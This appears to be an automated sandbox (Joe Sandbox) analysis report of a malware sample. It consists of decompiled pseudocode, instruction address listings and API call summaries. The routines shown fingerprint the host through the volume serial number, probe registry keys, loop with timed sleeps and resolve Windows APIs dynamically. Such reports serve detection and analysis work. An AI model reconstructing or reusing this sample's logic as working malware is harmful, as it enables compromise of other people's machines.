													_t395 = _t377;
													__eflags = _t231 - 2;
													if(_t231 == 2) {
														L39:
														_t233 = E003C36E0(_t395, _t397, _t400 - 0xc, _t400 - 0x5c0,  *(_t400 - 0x14),  *(_t400 - 0x10));
														_t405 = _t405 + 0x10;
														asm("sbb edx, 0x0");
														 *(_t400 - 0x14) = _t397 - 0x708;
														 *(_t400 - 0x10) = _t395;
														__eflags = _t233 - 1;
														if(_t233 == 1) {
															 *0x3e85ac = _t233;
														}
														L41:
														_t235 = _t397 -  *(_t400 - 0x44);
														__eflags = _t235;
														asm("sbb ecx, [ebp-0x40]");
														 *(_t400 - 0x5c) = _t395;
														if(__eflags < 0) {
															L48:
															_t397 = _t397 -  *(_t400 - 0x30);
															__eflags = _t397;
															asm("sbb edi, [ebp-0x2c]");
															 *(_t400 - 0x5c) = _t395;
															if(__eflags < 0) {
																L55:
																_t236 = E003C9890( *((intOrPtr*)(_t400 - 0x5bc)));
																__eflags = _t236;
																if(_t236 == 0) {
																	L70:
																	_t289 = 0;
																	__eflags = 0;
																	goto L71;
																}
																_push(1);
																_push(_t400 - 0x5c0);
																_t237 = E003C5A10();
																_t405 = _t405 + 8;
																__eflags = _t237;
																if(__eflags == 0) {
																	goto L70;
																}
																_t377 = _t400 - 0x5c0;
																_t238 = E003C7560(_t289, __eflags, _t377);
																_t405 = _t405 + 4;
																__eflags = _t238;
																if(_t238 == 0) {
																	__eflags =  *0x3e85ac;
																	if( *0x3e85ac != 0) {
																		L75:
																		E003C1700(_t400 - 0xc);
																		E003CF850(_t289, _t400 - 0x5c0);
																		E003CC930(_t400 - 4);
																		_t289 = 0;
																		__eflags = 0;
																		L76:
																		_t415 =  *0x3e85ac - _t289; // 0x0
																		if(_t415 == 0) {
																			L89:
																			E003C9480();
																			E003C7E10();
																			ExitProcess(_t289);
																		}
																		_t361 =  *0x3e8628; // 0x622508
																		_t398 = 0;
																		 *((intOrPtr*)(_t400 - 0x70)) = 0;
																		 *((intOrPtr*)(_t400 - 0x6c)) = 0;
																		 *((intOrPtr*)(_t400 - 0x68)) = 0;
																		 *((intOrPtr*)(_t400 - 0x64)) = 0;
																		 *(_t400 - 0x18) = 0;
																		 *((intOrPtr*)(_t400 - 0xb8)) = 0x44;
																		 *((intOrPtr*)( *((intOrPtr*)(_t361 + 0xb8))))(_t400 - 0xb8);
																		E003C8030(_t400 - 0x18);
																		_t198 = E003D1D90(0x20a, 0);
																		_t290 = _t198;
																		if(_t290 == 0) {
																			L88:
																			_t363 =  *0x3e8628; // 0x622508
																			 *((intOrPtr*)( *((intOrPtr*)(_t363 + 0xd8))))( *(_t400 - 0x18), _t398, _t398, _t398, _t398, _t398, _t398, _t290, _t400 - 0xb8, _t400 - 0x70);
																			_t364 =  *0x3e8628; // 0x622508
																			 *((intOrPtr*)( *((intOrPtr*)(_t364 + 0xf8))))( *((intOrPtr*)(_t400 - 0x70)));
																			_t365 =  *0x3e8628; // 0x622508
																			 *((intOrPtr*)( *((intOrPtr*)(_t365 + 0xf8))))( *((intOrPtr*)(_t400 - 0x6c)));
																			E003CBB40( *(_t400 - 0x18));
																			_t289 = 0;
																			goto L89;
																		}
																		_t366 =  *(_t400 - 0x18);
																		_t399 = 0x104;
																		_t396 = 0;
																		while(1) {
																			_t167 = _t399 + 0x7ffffefa; // 0x7ffffffe
																			if(_t167 == 0) {
																				break;
																			}
																			_t313 =  *_t366 & 0x0000ffff;
																			if(_t313 == 0) {
																				break;
																			}
																			 *_t198 = _t313;
																			_t198 =  &(_t198[0]);
																			_t366 =  &(_t366[1]);
																			_t399 = _t399 - 1;
																			if(_t399 != 0) {
																				continue;
																			}
																			L84:
																			_t198 = _t198 - 2;
																			_t396 = 0x8007007a;
																			L85:
																			 *_t198 = 0;
																			if(_t396 >= 0) {
																				_t207 =  *0x3e8628; // 0x622508
																				 *((intOrPtr*)( *((intOrPtr*)(_t207 + 0x1e8))))(_t290);
																			}
																			_t398 = 0;
																			goto L88;
																		}
																		__eflags = _t399;
																		if(_t399 != 0) {
																			goto L85;
																		}
																		goto L84;
																	}
																	goto L70;
																}
																__eflags =  *0x3e85ac;
																if( *0x3e85ac != 0) {
																	goto L75;
																}
																_t242 =  *0x3e8584; // 0x0
																_t397 = 0xa;
																__eflags = _t242;
																if(_t242 == 0) {
																	_t243 =  *(_t400 - 0x24);
																	__eflags = _t243;
																	if(_t243 <= 0) {
																		while(1) {
																			L63:
																			_t337 =  *0x3e8584; // 0x0
																			__eflags = _t337;
																			if(_t337 != 0) {
																				goto L65;
																			}
																			_t377 =  *0x3e8628; // 0x622508
																			 *((intOrPtr*)( *((intOrPtr*)(_t377 + 0xc8))))(0x4e20);
																			_t397 = _t397 - 1;
																			__eflags = _t397;
																			if(_t397 > 0) {
																				continue;
																			}
																			goto L65;
																		}
																		goto L65;
																	}
																	L62:
																	_t247 = _t243 - 1;
																	__eflags = _t247;
																	 *(_t400 - 0x24) = _t247;
																	_t397 = 1;
																	goto L63;
																}
																_t138 = _t397 - 5; // 0x5
																_t243 = _t138;
																 *0x3e8584 = 0;
																goto L62;
															}
															if(__eflags > 0) {
																L51:
																_t397 = E003CF2D0(_t400 - 0x5c0);
																_t249 = E003C99A0(_t289, _t400 - 0x19, _t395, _t248, _t248);
																_push(8);
																__eflags = _t249;
																if(__eflags == 0) {
																	_push(_t400 - 0x9c0);
																	E003C9090(__eflags);
																	E003C9090(__eflags, _t400 - 0xdc0, 0xa);
																	_push(_t400 - 0xdc0);
																	_t383 = _t400 - 0x9c0;
																	_push(_t383);
																	_push(0xe);
																	_push(_t400 - 0x5c0);
																} else {
																	_push(_t400 - 0x9c0);
																	E003C9090(__eflags);
																	E003C9090(__eflags, _t400 - 0xdc0, 9);
																	_t383 = _t400 - 0xdc0;
																	_push(_t383);
																	_push(_t400 - 0x9c0);
																	_push(0xe);
																	_push(_t400 - 0x5c0);
																}
																E003C5A10();
																_t255 = E003CBB40(_t397);
																__imp___time64(0);
																_t405 = _t405 + 0x28;
																 *(_t400 - 0x30) = _t255;
																 *(_t400 - 0x2c) = _t383;
																goto L55;
															}
															__eflags = _t397 - 0x7080;
															if(_t397 <= 0x7080) {
																goto L55;
															}
															goto L51;
														}
														if(__eflags > 0) {
															L44:
															_t385 =  *0x3e857c; // 0x0
															_t261 = _t397 -  *((intOrPtr*)( *((intOrPtr*)( *(_t400 - 0x5b8) + 0x28)) + _t385 * 8));
															__eflags = _t261;
															_t289 = _t395;
															asm("sbb ebx, [ecx+edx*8+0x4]");
															 *(_t400 - 0x5c) = _t395;
															if(__eflags < 0) {
																goto L48;
															}
															if(__eflags > 0) {
																L47:
																 *(_t400 - 0x44) = _t397;
																 *(_t400 - 0x40) = _t395;
																_t263 = E003C1FE0(_t289, _t395, _t397, _t400 - 0xc, _t400 - 0x5c0, _t400 - 0x5b8);
																_t405 = _t405 + 0xc;
																__eflags = _t263;
																if(_t263 != 0) {
																	_t264 = E003D0AD0(_t400 - 0x5c0,  *((intOrPtr*)( *(_t400 - 0x5b8) + 0x14)));
																	__eflags = _t264;
																	if(_t264 == 0) {
																		goto L75;
																	}
																	 *0x3e857c = 0;
																	goto L70;
																}
																goto L48;
															}
															__eflags = _t261 - 0x3840;
															if(_t261 <= 0x3840) {
																goto L48;
															}
															goto L47;
														}
														__eflags = _t235 - 0x4b0;
														if(_t235 <= 0x4b0) {
															goto L48;
														}
														goto L44;
													}
													_t266 = _t397 -  *(_t400 - 0x14);
													__eflags = _t266;
													asm("sbb ecx, [ebp-0x10]");
													 *(_t400 - 0x5c) = _t395;
													if(__eflags < 0) {
														goto L41;
													}
													if(__eflags > 0) {
														goto L39;
													}
													__eflags = _t266 - 0xe10;
													if(_t266 <= 0xe10) {
														goto L41;
													}
													goto L39;
													L65:
													_t230 =  *(_t400 - 0x48) + 1;
													 *(_t400 - 0x48) = _t230;
													__eflags = _t230 - 0x64;
												} while (_t230 < 0x64);
												goto L70;
											}
											if(__eflags > 0) {
												L27:
												_t276 = E003CAC90( *(_t400 - 0x5b8), _t400 - 0x5c0);
												_t405 = _t405 + 8;
												__eflags = _t276;
												if(__eflags == 0) {
													goto L71;
												}
												 *(_t400 - 0x3c) = _t397;
												 *(_t400 - 0x38) = _t395;
												goto L29;
											}
											__eflags = _t224 - 0xe10;
											if(__eflags <= 0) {
												goto L29;
											}
											goto L27;
										}
										__eflags = _t221 - 1;
										if(_t221 != 1) {
											E003CC870(_t400 - 0x5c0, _t221);
											_t405 = _t405 + 8;
										}
										_t352 =  *0x3e8628; // 0x622508
										 *((intOrPtr*)( *((intOrPtr*)(_t352 + 0xc8))))(0x3e8);
										goto L71;
									}
									if(__eflags > 0) {
										L15:
										_t281 = E003CD890(_t397, __eflags, _t400 - 0xc, _t400 - 0x5c0, _t400 - 0x58);
										_t408 = _t408 + 0xc;
										__eflags = _t281;
										if(_t281 == 0) {
											_t282 =  *((intOrPtr*)( *(_t400 - 0x5b8) + 0x24));
											_t354 =  *0x3e857c; // 0x0
											 *(_t282 + _t354 * 8) = _t397;
											_t392 =  *0x3e857c; // 0x0
											 *(_t282 + 4 + _t392 * 8) = _t395;
											goto L20;
										}
										__eflags = _t281 - 1;
										if(_t281 != 1) {
											E003CC870(_t400 - 0x5c0, _t281);
											_t405 = _t408 + 8;
										}
										_t283 =  *0x3e8628; // 0x622508
										 *((intOrPtr*)( *((intOrPtr*)(_t283 + 0xc8))))(0x3e8);
										goto L70;
									}
									__eflags = _t219 - 0x3840;
									if(__eflags <= 0) {
										goto L20;
									}
									goto L15;
								}
								_t394 =  *0x3e8628; // 0x622508
								 *((intOrPtr*)( *((intOrPtr*)(_t394 + 0xc8))))(0x3e8);
								L71:
								_t332 =  *0x3e857c; // 0x0
								_t212 =  *(_t400 - 0x5b8);
								_t316 = _t332 + 1;
								 *0x3e857c = _t316;
								__eflags = _t316 -  *((intOrPtr*)(_t212 + 0x18));
							} while (__eflags < 0);
							L72:
							_t214 = E003E0A40(_t395, _t397, __eflags, _t400 - 0xc, _t400 - 0x5b8);
							_t405 = _t405 + 8;
							__eflags = _t214;
							if(_t214 == 0) {
								__eflags =  *(_t400 - 0x20) - _t289;
								if(__eflags == 0) {
									L003E0D30(_t289, _t395, _t397, __eflags, _t400 - 0xc, _t400 - 0x5c0);
									_t405 = _t405 + 8;
								}
							}
						}
					}
				}
				L5:
				E003C1700(_t400 - 0xc);
				E003CF850(_t289, _t400 - 0x5c0);
				E003CC930(_t400 - 4);
				goto L76;
			}




































































    0x003cfd6b
    0x003cfd71
    0x003cfd76
    0x003cfd79
    0x003cfd7f
    0x003cfd8a
    0x003cfd90
    0x003cfd96
    0x003cfda7
    0x003cfdaf
    0x003cfdb7
    0x003cfdbc
    0x003cfdbe
    0x003cfdc1
    0x003cfdc4
    0x003cfdc9
    0x003cfdcc
    0x003cfdce
    0x003cfddf
    0x003cfdd0
    0x003cfdd7
    0x003cfdd7
    0x003cfdee
    0x003cfe05
    0x003cfe18
    0x003cfe28
    0x003cfe2d
    0x003cfe32
    0x003cfe5d
    0x003cfe72
    0x003cfe74
    0x00000000
    0x003cfe76
    0x003cfe7c
    0x003cfe99
    0x003cfea2
    0x003cfea5
    0x003cfea8
    0x003cfeab
    0x003cfeae
    0x003cfeb1
    0x003cfeb4
    0x003cfeb7
    0x003cfeba
    0x003cfebc
    0x003cfec0
    0x003cfec0
    0x003cfec6
    0x003cfec8
    0x003cfece
    0x003cfed1
    0x003cfed4
    0x00000000
    0x00000000
    0x003cfee0
    0x003cfee3
    0x003cfef4
    0x003cfef9
    0x003cfefb
    0x003cff16
    0x003cff25
    0x003cff27
    0x003cff2d
    0x003cff30
    0x003cff32
    0x003cff32
    0x003cff37
    0x003cff3b
    0x003cff3e
    0x003cffac
    0x003cffbb
    0x003cffbd
    0x003cffc2
    0x003cffc5
    0x003cffc7
    0x003cffff
    0x003d0002
    0x003d0007
    0x003d0007
    0x003d000c
    0x003d000f
    0x003d0012
    0x003d0041
    0x003d0048
    0x003d004d
    0x003d0053
    0x003d0058
    0x003d005a
    0x003d005c
    0x003d0091
    0x003d00cc
    0x003d00cd
    0x003d00db
    0x003d00e6
    0x003d00ed
    0x003d00ee
    0x003d00f0
    0x003d00f6
    0x003d0093
    0x003d0099
    0x003d009a
    0x003d00a8
    0x003d00b3
    0x003d00b4
    0x003d00ba
    0x003d00bb
    0x003d00c3
    0x003d00c3
    0x003d005e
    0x003d0064
    0x003d0065
    0x003d0073
    0x003d0078
    0x003d007e
    0x003d0085
    0x003d0086
    0x003d008e
    0x003d008e
    0x003d00f7
    0x003d00fc
    0x003d00ff
    0x003d0102
    0x003d0104
    0x003d010a
    0x003d010c
    0x003d0111
    0x003d0114
    0x003d0116
    0x003d0119
    0x003d0133
    0x003d0146
    0x003d014b
    0x003d0158
    0x003d015b
    0x003d015e
    0x003d0161
    0x003d0164
    0x003d0166
    0x003d0166
    0x003d016b
    0x003d016d
    0x003d016d
    0x003d0172
    0x003d0175
    0x003d0178
    0x003d01d3
    0x003d01d3
    0x003d01d3
    0x003d01d6
    0x003d01d9
    0x003d01dc
    0x003d028f
    0x003d0295
    0x003d029a
    0x003d029c
    0x003d0372
    0x003d0372
    0x003d0372
    0x00000000
    0x003d0372
    0x003d02a8
    0x003d02aa
    0x003d02ab
    0x003d02b0
    0x003d02b3
    0x003d02b5
    0x00000000
    0x00000000
    0x003d02bb
    0x003d02c2
    0x003d02c7
    0x003d02ca
    0x003d02cc
    0x003d0369
    0x003d0370
    0x003d03cc
    0x003d03cf
    0x003d03da
    0x003d03e2
    0x003d03e7
    0x003d03e7
    0x003d03e9
    0x003d03e9
    0x003d03ef
    0x003d04eb
    0x003d04eb
    0x003d04f0
    0x003d04f6
    0x003d04f6
    0x003d03f5
    0x003d03fb
    0x003d0403
    0x003d0406
    0x003d0409
    0x003d040c
    0x003d040f
    0x003d0412
    0x003d0423
    0x003d0429
    0x003d0434
    0x003d0439
    0x003d0440
    0x003d0495
    0x003d049c
    0x003d04b7
    0x003d04bc
    0x003d04c9
    0x003d04ce
    0x003d04db
    0x003d04e1
    0x003d04e9
    0x00000000
    0x003d04e9
    0x003d0442
    0x003d0445
    0x003d044a
    0x003d0450
    0x003d0450
    0x003d0458
    0x00000000
    0x00000000
    0x003d045a
    0x003d0460
    0x00000000
    0x00000000
    0x003d0462
    0x003d0465
    0x003d0468
    0x003d046b
    0x003d046c
    0x00000000
    0x00000000
    0x003d0474
    0x003d0474
    0x003d0477
    0x003d047c
    0x003d047e
    0x003d0483
    0x003d0485
    0x003d0491
    0x003d0491
    0x003d0493
    0x00000000
    0x003d0493
    0x003d0470
    0x003d0472
    0x00000000
    0x00000000
    0x00000000
    0x003d0472
    0x00000000
    0x003d0370
    0x003d02d2
    0x003d02d9
    0x00000000
    0x00000000
    0x003d02df
    0x003d02e4
    0x003d02e9
    0x003d02eb
    0x003d02fc
    0x003d02ff
    0x003d0301
    0x003d0310
    0x003d0310
    0x003d0310
    0x003d0316
    0x003d0318
    0x00000000
    0x00000000
    0x003d031a
    0x003d032b
    0x003d032d
    0x003d032e
    0x003d0330
    0x00000000
    0x00000000
    0x00000000
    0x003d0330
    0x00000000
    0x003d0310
    0x003d0303
    0x003d0303
    0x003d0303
    0x003d0304
    0x003d0307
    0x00000000
    0x003d0307
    0x003d02ed
    0x003d02ed
    0x003d02f0
    0x00000000
    0x003d02f0
    0x003d01e2
    0x003d01f0
    0x003d01fb
    0x003d0201
    0x003d0206
    0x003d0208
    0x003d020a
    0x003d0245
    0x003d0246
    0x003d0254
    0x003d025f
    0x003d0260
    0x003d0266
    0x003d0267
    0x003d026f
    0x003d020c
    0x003d0212
    0x003d0213
    0x003d0221
    0x003d0226
    0x003d022c
    0x003d0233
    0x003d0234
    0x003d023c
    0x003d023c
    0x003d0270
    0x003d0279
    0x003d0280
    0x003d0286
    0x003d0289
    0x003d028c
    0x00000000
    0x003d028c
    0x003d01e4
    0x003d01ea
    0x00000000
    0x00000000
    0x00000000
    0x003d01ea
    0x003d017a
    0x003d0183
    0x003d018c
    0x003d0194
    0x003d0194
    0x003d0197
    0x003d0199
    0x003d019d
    0x003d01a0
    0x00000000
    0x00000000
    0x003d01a2
    0x003d01ab
    0x003d01bd
    0x003d01c0
    0x003d01c3
    0x003d01c8
    0x003d01cb
    0x003d01cd
    0x003d0354
    0x003d0359
    0x003d035b
    0x00000000
    0x00000000
    0x003d035d
    0x00000000
    0x003d035d
    0x00000000
    0x003d01cd
    0x003d01a4
    0x003d01a9
    0x00000000
    0x00000000
    0x00000000
    0x003d01a9
    0x003d017c
    0x003d0181
    0x00000000
    0x00000000
    0x00000000
    0x003d0181
    0x003d011d
    0x003d011d
    0x003d0122
    0x003d0125
    0x003d0128
    0x00000000
    0x00000000
    0x003d012a
    0x00000000
    0x00000000
    0x003d012c
    0x003d0131
    0x00000000
    0x00000000
    0x00000000
    0x003d0332
    0x003d0335
    0x003d0336
    0x003d0339
    0x003d0339
    0x00000000
    0x003d0342
    0x003d0014
    0x003d001d
    0x003d002b
    0x003d0030
    0x003d0033
    0x003d0035
    0x00000000
    0x00000000
    0x003d003b
    0x003d003e
    0x00000000
    0x003d003e
    0x003d0016
    0x003d001b
    0x00000000
    0x00000000
    0x00000000
    0x003d001b
    0x003cffc9
    0x003cffcc
    0x003cffd6
    0x003cffdb
    0x003cffdb
    0x003cffde
    0x003cffef
    0x00000000
    0x003cffef
    0x003cff40
    0x003cff49
    0x003cff58
    0x003cff5d
    0x003cff60
    0x003cff62
    0x003cff96
    0x003cff99
    0x003cff9f
    0x003cffa2
    0x003cffa8
    0x00000000
    0x003cffa8
    0x003cff64
    0x003cff67
    0x003cff71
    0x003cff76
    0x003cff76
    0x003cff79
    0x003cff89
    0x00000000
    0x003cff89
    0x003cff42
    0x003cff47
    0x00000000
    0x00000000
    0x00000000
    0x003cff47
    0x003cfefd
    0x003cff0e
    0x003d0374
    0x003d0374
    0x003d037a
    0x003d0380
    0x003d0381
    0x003d0387
    0x003d0387
    0x003d0390
    0x003d039b
    0x003d03a0
    0x003d03a3
    0x003d03a5
    0x003d03ab
    0x003d03ae
    0x003d03bf
    0x003d03c4
    0x003d03c4
    0x003d03ae
    0x003d03a5
    0x003cfec0
    0x003cfe74
    0x003cfe34
    0x003cfe37
    0x003cfe42
    0x003cfe4a
    0x00000000

    APIs
    • ??3@YAXPAX@Z.MSVCRT ref: 003CFD71
      • Part of subcall function 003C1B20: memset.MSVCRT ref: 003C1B53
      • Part of subcall function 003C1B20: memset.MSVCRT ref: 003C1B62
      • Part of subcall function 003C1B20: ??2@YAPAXI@Z.MSVCRT ref: 003C1B79
      • Part of subcall function 003C1B20: ??2@YAPAXI@Z.MSVCRT ref: 003C1B98
    • ??2@YAPAXI@Z.MSVCRT ref: 003CFDC4
      • Part of subcall function 003C1F00: memcpy.MSVCRT ref: 003C1F9C
      • Part of subcall function 003C69F0: ??2@YAPAXI@Z.MSVCRT ref: 003C6A09
      • Part of subcall function 003C69F0: ??2@YAPAXI@Z.MSVCRT ref: 003C6A24
      • Part of subcall function 003C69F0: ??3@YAXPAX@Z.MSVCRT ref: 003C6ADA
      • Part of subcall function 003C69F0: ??3@YAXPAX@Z.MSVCRT ref: 003C6B34
      • Part of subcall function 003C69F0: ??3@YAXPAX@Z.MSVCRT ref: 003C6B88
      • Part of subcall function 003C69F0: ??3@YAXPAX@Z.MSVCRT ref: 003C6C0A
      • Part of subcall function 003C69F0: ??3@YAXPAX@Z.MSVCRT ref: 003C6C1E
      • Part of subcall function 003CF850: ??3@YAXPAX@Z.MSVCRT ref: 003CF90D
      • Part of subcall function 003CF850: ??3@YAXPAX@Z.MSVCRT ref: 003CF924
      • Part of subcall function 003CF850: ??3@YAXPAX@Z.MSVCRT ref: 003CF955
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003C9480: FreeLibrary.KERNELBASE(00000000,003D04F0), ref: 003C94B1
    • ExitProcess.KERNEL32 ref: 003D04F6
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CF0B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74

    Control-flow Graph

    C-Code - Quality: 88%
    			E003CF0B0(intOrPtr _a4) {
				long _v8;
				intOrPtr _v14;
				signed short _v18;
				intOrPtr _v24;
				short _v34;
				intOrPtr _v38;
				short _v40;
				char _v240;
				short _v760;
				void* _t46;
				void* _t55;

				_v8 = 0;
				memset( &_v760, 0, 0x208);
				if(GetWindowsDirectoryW( &_v760, 0x208) == 0) {
					_v760 = 0x43;
				}
				_v40 = _v760;
				_v38 = 0x5c003a;
				_v34 = 0;
				GetVolumeInformationW( &_v40, 0, 0,  &_v8, 0, 0, 0, 0); // executed
				_v24 = E003E1200( &_v8);
				E003E1200( &_v8);
				_v18 = E003E1200( &_v8);
				_t46 = 0;
				do {
					 *((char*)(_t55 + _t46 - 0xc)) = E003E1200( &_v8);
					_t46 = _t46 + 1;
					_t61 = _t46 - 8;
				} while (_t46 < 8);
				E003C9090(_t61, _a4, 0xa1);
				E003C9090(_t61,  &_v240, 0xc6);
				_push(_v14);
				_push(_v18 & 0x0000ffff);
				return E003D0C10(_a4, 0x64,  &_v240, _v24);
			}














    0x003cf0c7
    0x003cf0ce
    0x003cf0ea
    0x003cf0f1
    0x003cf0f1
    0x003cf0ff
    0x003cf113
    0x003cf11a
    0x003cf11e
    0x003cf12c
    0x003cf132
    0x003cf13f
    0x003cf143
    0x003cf145
    0x003cf14d
    0x003cf151
    0x003cf152
    0x003cf152
    0x003cf161
    0x003cf172
    0x003cf181
    0x003cf182
    0x003cf19a

    APIs
    • memset.MSVCRT ref: 003CF0CE
    • GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 003CF0E2
    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003CF11E
      • Part of subcall function 003D0C10: _vsnwprintf.MSVCRT ref: 003D0C42
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CCEA0, Relevance: 6.1, APIs: 4, Instructions: 69registrystring

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 712 3ccea0-3ccea9 713 3cceab-3cceaf 712->713 714 3cceb0-3cceb6 712->714 715 3ccebc-3ccec5 lstrlenW 714->715 716 3ccf41-3ccf46 714->716 715->716 717 3ccec7-3ccf01 RegOpenKeyExW * 2 715->717 718 3ccf26 717->718 719 3ccf03-3ccf20 RegOpenKeyExW 717->719 721 3ccf28-3ccf40 718->721 719->718 720 3ccf22-3ccf24 719->720 720->721
    C-Code - Quality: 100%
    			E003CCEA0(void* _a4, short* _a8) {
				long _t16;
				long _t21;
				void* _t24;
				intOrPtr _t28;
				void* _t34;
				short* _t36;

				_t34 = _a4;
				if(_t34 != 0) {
					_t36 = _a8;
					if(_t36 == 0 || lstrlenW(_t36) == 0) {
						return 0;
					} else {
						RegOpenKeyExW(_t34, _t36, 0, 0x20119,  &_a4);
						_t16 = RegOpenKeyExW(_t34, _t36, 0, 0x20119,  &_a4); // executed
						if(_t16 == 2) {
							L7:
							_t24 = 0;
						} else {
							_t21 = RegOpenKeyExW(_t34, _t36, 0, 0x20119,  &_a4); // executed
							if(_t21 != 0) {
								goto L7;
							} else {
								_t24 = 1;
							}
						}
						_t28 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t28 + 0x198))))(_a4);
						return _t24;
					}
				} else {
					return 0;
				}
			}









    0x003ccea4
    0x003ccea9
    0x003cceb1
    0x003cceb6
    0x003ccf46
    0x003ccec7
    0x003ccee1
    0x003ccefc
    0x003ccf01
    0x003ccf26
    0x003ccf26
    0x003ccf03
    0x003ccf1c
    0x003ccf20
    0x00000000
    0x003ccf22
    0x003ccf22
    0x003ccf22
    0x003ccf20
    0x003ccf2b
    0x003ccf38
    0x003ccf40
    0x003ccf40
    0x003cceab
    0x003cceaf
    0x003cceaf

    APIs
    • lstrlenW.KERNEL32(?,?,?,?,003C97FA,?,?), ref: 003CCEBD
    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCEE1
    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCEFC
    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCF1C
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CFD15, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110

    Control-flow Graph

    C-Code - Quality: 54%
    			E003CFD15() {
				intOrPtr _t183;
				void* _t184;
				void* _t187;
				int _t194;
				signed int* _t204;
				int _t213;
				int _t218;
				int _t220;
				int _t224;
				int _t225;
				int _t227;
				int _t230;
				void* _t232;
				int _t236;
				int _t237;
				int _t239;
				int _t241;
				int _t242;
				int _t243;
				int _t244;
				int _t248;
				int _t249;
				int _t253;
				int _t255;
				int _t261;
				int _t267;
				int _t269;
				int _t270;
				int _t272;
				int _t282;
				int _t287;
				intOrPtr _t288;
				int _t289;
				signed int* _t299;
				int _t302;
				signed int _t322;
				signed int _t325;
				signed int _t341;
				int _t346;
				int _t361;
				signed int _t363;
				int _t374;
				int _t376;
				int _t377;
				int _t378;
				signed short* _t379;
				int _t384;
				signed int _t385;
				int _t390;
				int _t396;
				signed int _t398;
				signed int _t405;
				int _t407;
				int _t408;
				void* _t409;
				void* _t411;
				int _t412;
				void* _t413;
				void* _t414;
				void* _t415;
				void* _t416;
				void* _t417;
				void* _t421;
				void* _t422;
				void* _t423;
				void* _t427;

				E003CE7D0(_t413 - 0x9c0,  *((intOrPtr*)(_t413 - 0x34))); // executed
				_t415 = _t414 + 8;
				_t183 = E003E1210();
				_push(8);
				 *0x3e8580 = _t183; // executed
				L003CA47E(); // executed
				_t416 = _t415 + 4;
				if(_t183 == _t298) {
					_t410 = 0;
					__eflags = 0;
				} else {
					_t410 = E003CE850(_t183);
				}
				_t184 = E003C3D50(_t410); // executed
				if(_t184 != 0) {
					__eflags = _t410 - _t298;
					if(__eflags != 0) {
						E003C2420(_t410);
						_push(_t410);
						L003C1CB0();
						_t416 = _t416 + 4;
					}
					_t302 =  *0x3e8628; // 0x622508
					 *0x3e8570 = _t298;
					 *0x3e8584 = _t298;
					 *0x3e8574 = _t298;
					 *0x3e8578 = _t298;
					 *((intOrPtr*)( *((intOrPtr*)(_t302 + 0xcc))))(0x3e8594, 0x800);
					E003C1B20(_t413 - 0x5c0,  *((intOrPtr*)(_t302 + 0xcc)), __eflags);
					_t187 = E003CBB30(_t413 - 0xc);
					_push(0x34);
					 *(_t413 - 0x58) = _t298;
					 *(_t413 - 0x28) = _t298;
					L003CA47E();
					_t417 = _t416 + 4;
					__eflags = _t187 - _t298;
					if(__eflags == 0) {
						 *(_t413 - 0x5b8) = _t298;
					} else {
						 *(_t413 - 0x5b8) = E003C70B0(_t187);
					}
					E003C9090(__eflags, _t413 - 0x9c0, 3);
					E003CF550(_t413 - 0x50, _t298, _t413 - 0x9c0, 0xa, _t413 - 0x54, _t413 - 0x50);
					E003C1F00(_t413 - 0xc,  *((intOrPtr*)(_t413 - 0x54)),  *((intOrPtr*)(_t413 - 0x50)));
					_t194 = E003C69F0(_t413 - 0x5b8, _t413 - 0xc, _t413 - 0x5b8);
					_t416 = _t417 + 0x24;
					__eflags = _t194;
					if(_t194 != 0) {
						 *(_t413 - 0x5c0) = _t413 - 0xc;
